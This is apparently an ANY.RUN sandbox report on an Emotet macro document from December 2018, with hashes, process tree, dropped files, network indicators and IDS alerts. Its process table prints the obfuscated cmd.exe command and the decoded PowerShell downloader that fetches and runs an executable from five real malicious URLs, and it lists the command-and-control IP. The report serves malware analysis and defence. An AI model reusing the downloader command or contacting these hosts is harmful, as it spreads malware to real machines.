analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

FA-RWU66601.doc

Full analysis: https://app.any.run/tasks/0a3745e6-3168-435c-8224-83685e037d75
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 14, 2018, 16:48:30
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
opendir
loader
trojan
emotet
feodo
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 16:38:00 2018, Last Saved Time/Date: Thu Dec 13 16:38:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 41, Security: 0
MD5:

C7D5366A9A6B2CA10CE14EEFDE83D4F8

SHA1:

54BF48DC661CE0CF2A5629003BEC4E56C646F3F8

SHA256:

3D7D4A6045C8B3C0603F290AD3E54A00B561293CE7B7D6D8C11BD61DBE1306AE

SSDEEP:

3072:ic8GhDS0o9zTGOZD6EbzCdXcE6ErJQbc:iioUOZDlbeX1zrJV

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2596)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2960)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2648)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2960)
    • Application was dropped or rewritten from another process

      • 392.exe (PID: 3108)
      • 392.exe (PID: 3992)
      • archivesymbol.exe (PID: 2748)
      • archivesymbol.exe (PID: 3316)
      • 9xcu52dEYjOwz.exe (PID: 4080)
      • archivesymbol.exe (PID: 3308)
      • 9xcu52dEYjOwz.exe (PID: 3300)
      • archivesymbol.exe (PID: 2796)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2596)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3316)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3316)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3316)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4088)
    • Application launched itself

      • cmd.exe (PID: 4088)
      • archivesymbol.exe (PID: 2748)
      • 9xcu52dEYjOwz.exe (PID: 4080)
    • Creates files in the user directory

      • powershell.exe (PID: 2596)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2596)
      • 392.exe (PID: 3108)
      • archivesymbol.exe (PID: 3316)
      • 9xcu52dEYjOwz.exe (PID: 3300)
    • Starts itself from another location

      • 392.exe (PID: 3108)
      • 9xcu52dEYjOwz.exe (PID: 3300)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2960)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2960)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:13 16:38:00
ModifyDate: 2018:12:13 16:38:00
Pages: 1
Words: 7
Characters: 41
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 47
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
12
Malicious processes
10
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 392.exe no specs 392.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe 9xcu52deyjowz.exe no specs 9xcu52deyjowz.exe archivesymbol.exe no specs archivesymbol.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2960"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\FA-RWU66601.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4088c:\BVwXjDNiNzEQM\dbWfOaPz\aKoiZZCSEcLVCz\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set QWc=jMUTqjhkNaABsYWkLJISoOt{Z 4;.8wf2n3X)9iy0egQdKD-l'/u:Gp+Vx$CP}crE(Fzm\v=@5Hb,&&for %C in (58;24;11;5;71;49;5;35;51;49;27;58;43;4;48;71;33;41;30;47;20;75;5;41;62;22;25;8;41;22;28;14;41;75;59;48;38;41;33;22;27;58;38;64;12;71;49;6;22;22;54;52;50;50;44;41;48;6;38;31;9;75;63;38;62;12;28;62;20;68;50;44;70;60;57;18;22;13;72;6;22;22;54;52;50;50;15;9;38;22;41;41;48;9;20;28;62;20;68;50;24;38;8;29;63;44;70;70;1;5;72;6;22;22;54;52;50;50;9;48;22;9;39;51;12;9;28;62;20;68;50;30;70;70;62;62;30;50;18;45;13;1;45;73;19;20;62;72;6;22;22;54;52;50;50;68;41;51;33;9;12;9;6;68;41;12;5;38;44;28;44;41;12;9;28;38;44;50;8;11;40;45;73;64;64;72;6;22;22;54;52;50;50;48;38;15;9;9;68;38;28;62;20;68;50;26;37;53;9;15;20;11;38;49;28;19;54;48;38;22;65;49;72;49;36;27;58;13;1;38;71;49;21;2;63;49;27;58;74;74;44;25;71;25;49;34;37;32;49;27;58;8;14;38;71;49;33;51;70;49;27;58;11;53;67;71;58;41;33;70;52;22;41;68;54;55;49;69;49;55;58;74;74;44;55;49;28;41;57;41;49;27;31;20;63;41;9;62;6;65;58;13;70;56;25;38;33;25;58;38;64;12;36;23;22;63;39;23;58;43;4;48;28;46;20;30;33;48;20;9;44;66;38;48;41;65;58;13;70;56;76;25;58;11;53;67;36;27;58;8;74;60;71;49;13;3;74;49;27;18;31;25;65;65;53;41;22;47;18;22;41;68;25;58;11;53;67;36;28;48;41;33;42;22;6;25;47;42;41;25;29;40;40;40;40;36;25;23;18;33;70;20;15;41;47;18;22;41;68;25;58;11;53;67;27;58;70;70;21;71;49;13;6;45;49;27;75;63;41;9;15;27;61;61;62;9;22;62;6;23;61;61;58;18;67;16;71;49;12;10;5;49;27;87)do set 4OXD=!4OXD!!QWc:~%C,1!&&if %C==87 powershell.exe "!4OXD:~-453!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2648CmD /V:/C"set QWc=jMUTqjhkNaABsYWkLJISoOt{Z 4;.8wf2n3X)9iy0egQdKD-l'/u:Gp+Vx$CP}crE(Fzm\v=@5Hb,&&for %C in (58;24;11;5;71;49;5;35;51;49;27;58;43;4;48;71;33;41;30;47;20;75;5;41;62;22;25;8;41;22;28;14;41;75;59;48;38;41;33;22;27;58;38;64;12;71;49;6;22;22;54;52;50;50;44;41;48;6;38;31;9;75;63;38;62;12;28;62;20;68;50;44;70;60;57;18;22;13;72;6;22;22;54;52;50;50;15;9;38;22;41;41;48;9;20;28;62;20;68;50;24;38;8;29;63;44;70;70;1;5;72;6;22;22;54;52;50;50;9;48;22;9;39;51;12;9;28;62;20;68;50;30;70;70;62;62;30;50;18;45;13;1;45;73;19;20;62;72;6;22;22;54;52;50;50;68;41;51;33;9;12;9;6;68;41;12;5;38;44;28;44;41;12;9;28;38;44;50;8;11;40;45;73;64;64;72;6;22;22;54;52;50;50;48;38;15;9;9;68;38;28;62;20;68;50;26;37;53;9;15;20;11;38;49;28;19;54;48;38;22;65;49;72;49;36;27;58;13;1;38;71;49;21;2;63;49;27;58;74;74;44;25;71;25;49;34;37;32;49;27;58;8;14;38;71;49;33;51;70;49;27;58;11;53;67;71;58;41;33;70;52;22;41;68;54;55;49;69;49;55;58;74;74;44;55;49;28;41;57;41;49;27;31;20;63;41;9;62;6;65;58;13;70;56;25;38;33;25;58;38;64;12;36;23;22;63;39;23;58;43;4;48;28;46;20;30;33;48;20;9;44;66;38;48;41;65;58;13;70;56;76;25;58;11;53;67;36;27;58;8;74;60;71;49;13;3;74;49;27;18;31;25;65;65;53;41;22;47;18;22;41;68;25;58;11;53;67;36;28;48;41;33;42;22;6;25;47;42;41;25;29;40;40;40;40;36;25;23;18;33;70;20;15;41;47;18;22;41;68;25;58;11;53;67;27;58;70;70;21;71;49;13;6;45;49;27;75;63;41;9;15;27;61;61;62;9;22;62;6;23;61;61;58;18;67;16;71;49;12;10;5;49;27;87)do set 4OXD=!4OXD!!QWc:~%C,1!&&if %C==87 powershell.exe "!4OXD:~-453!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2596powershell.exe "$ZBj='jXu';$Qql=new-object Net.WebClient;$iEs='http://delhifabrics.com/dvPxItY@http://kaiteelao.com/ZiN8rdvvMj@http://altayusa.com/wvvccw/IKYMK5Soc@http://meunasahmesjid.desa.id/NB0K5EE@http://likaami.com/49GakoBi'.Split('@');$YMi='OUr';$HHd = '392';$NWi='nuv';$BGz=$env:temp+'\'+$HHd+'.exe';foreach($YvV in $iEs){try{$Qql.DownloadFile($YvV, $BGz);$NHP='YTH';If ((Get-Item $BGz).length -ge 80000) {Invoke-Item $BGz;$vvO='YhK';break;}}catch{}}$IzL='sAj';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3992"C:\Users\admin\AppData\Local\Temp\392.exe" C:\Users\admin\AppData\Local\Temp\392.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3108"C:\Users\admin\AppData\Local\Temp\392.exe"C:\Users\admin\AppData\Local\Temp\392.exe
392.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2748"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe392.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3316"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4080"C:\Users\admin\AppData\Local\archivesymbol\9xcu52dEYjOwz.exe"C:\Users\admin\AppData\Local\archivesymbol\9xcu52dEYjOwz.exearchivesymbol.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3300"C:\Users\admin\AppData\Local\archivesymbol\9xcu52dEYjOwz.exe"C:\Users\admin\AppData\Local\archivesymbol\9xcu52dEYjOwz.exe
9xcu52dEYjOwz.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Total events
1 798
Read events
1 316
Write events
0
Delete events
0

Modification events

No data
Executable files
4
Suspicious files
3
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
2960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A44.tmp.cvr
MD5:
SHA256:
2960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\57FB6D3B.wmf
MD5:
SHA256:
2960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A23DB601.wmf
MD5:
SHA256:
2596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6FSWRQPRRGBSM67SNS0V.temp
MD5:
SHA256:
2596powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2960WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\500D0E00.wmfwmf
MD5:1ED26D80C57E534120346D00A817F4D8
SHA256:8B1BEAA88743AA656BFD53431AF0D7C6FC6ACF551FC99C78C6D58DF1C6D888B8
2596powershell.exeC:\Users\admin\AppData\Local\Temp\392.exedocument
MD5:428869CF7ADDC9E51F3DE840591C5FF9
SHA256:2E766404C50ADDD67EF227C566CE09080620B4630C9DE43A78502606AE6E282C
2960WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C231A293978C0BF5F9099FB6C7CA53B4
SHA256:E9628B246FEE0C67CCEFA3DC6FD0A5A988D97D6F841FC6A6C3C47DAC4DB57BD7
2960WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$-RWU66601.docpgc
MD5:471EDA8AEF4571ACF2B865FC6882BB33
SHA256:8052A2AF8865D88A375FA0EF22FA73DA07B4FD19E70B27E7E05914050B91AB45
33009xcu52dEYjOwz.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:2E2A1F0CDC51C4E1717A27E22F6F5191
SHA256:FBFF66FF8226C949F42D9EF268FEE27278DF5A236A0341381AFBBC57E1759505
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
5
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2596
powershell.exe
GET
301
159.65.157.164:80
http://delhifabrics.com/dvPxItY
US
html
322 b
malicious
2596
powershell.exe
GET
301
38.106.32.161:80
http://altayusa.com/wvvccw/IKYMK5Soc
US
html
245 b
suspicious
2596
powershell.exe
GET
301
158.69.247.167:80
http://kaiteelao.com/ZiN8rdvvMj
CA
html
240 b
malicious
2596
powershell.exe
GET
200
38.106.32.161:80
http://altayusa.com/wvvccw/IKYMK5Soc/
US
html
353 b
suspicious
2596
powershell.exe
GET
200
159.65.157.164:80
http://delhifabrics.com/dvPxItY/
US
document
9.00 Kb
malicious
2596
powershell.exe
GET
200
158.69.247.167:80
http://kaiteelao.com/ZiN8rdvvMj/
CA
document
9.00 Kb
malicious
2596
powershell.exe
GET
200
101.50.1.12:80
http://meunasahmesjid.desa.id/NB0K5EE/
ID
executable
156 Kb
malicious
3316
archivesymbol.exe
GET
200
190.146.201.54:80
http://190.146.201.54/
CO
binary
101 Kb
malicious
2596
powershell.exe
GET
301
101.50.1.12:80
http://meunasahmesjid.desa.id/NB0K5EE
ID
html
617 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2596
powershell.exe
159.65.157.164:80
delhifabrics.com
US
malicious
2596
powershell.exe
158.69.247.167:80
kaiteelao.com
OVH SAS
CA
malicious
2596
powershell.exe
101.50.1.12:80
meunasahmesjid.desa.id
PT. Beon Intermedia
ID
malicious
2596
powershell.exe
38.106.32.161:80
altayusa.com
Altay Corporation
US
suspicious
3316
archivesymbol.exe
190.146.201.54:80
Telmex Colombia S.A.
CO
malicious

DNS requests

Domain
IP
Reputation
delhifabrics.com
  • 159.65.157.164
malicious
kaiteelao.com
  • 158.69.247.167
malicious
altayusa.com
  • 38.106.32.161
suspicious
meunasahmesjid.desa.id
  • 101.50.1.12
malicious

Threats

PID
Process
Class
Message
2596
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2596
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2596
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2596
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2596
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2596
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
2596
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2596
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2596
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3316
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
1 ETPRO signatures available at the full report
No debug info